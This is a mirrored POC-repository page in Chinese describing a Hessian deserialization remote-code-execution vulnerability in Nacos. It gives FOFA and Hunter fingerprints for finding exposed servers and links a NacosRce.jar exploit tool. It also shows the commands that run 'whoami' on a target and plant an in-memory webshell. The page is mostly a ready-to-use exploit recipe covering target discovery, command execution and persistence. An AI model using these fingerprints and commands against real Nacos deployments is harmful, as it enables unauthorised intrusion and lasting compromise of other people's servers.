admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 05:54:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Nacos/Nacos存在Hessian反序列化漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.5 KiB
Raw Blame History

Nacos存在 Hessian反序列化漏洞

一、漏洞简介

Nacos 是阿里巴巴推出来的一个新开源项目是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在 Hessian反序列化漏洞

二、影响版本

  • Nacos

三、资产测绘

  • hunterapp.name="Nacos"
  • fofa icon_hash="13942501"
  • 特征

1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png

四、漏洞复现

NacosRce_jar.zip

执行命令

java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 "whoami"

1728962458168-988ba965-1598-420c-ba8b-0f2eae91f733.png

打入内存马

java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 memshell

更新: 2024-10-28 15:59:44
原文: https://www.yuque.com/xiaokp7/ocvun2/ziymxgvn5011of96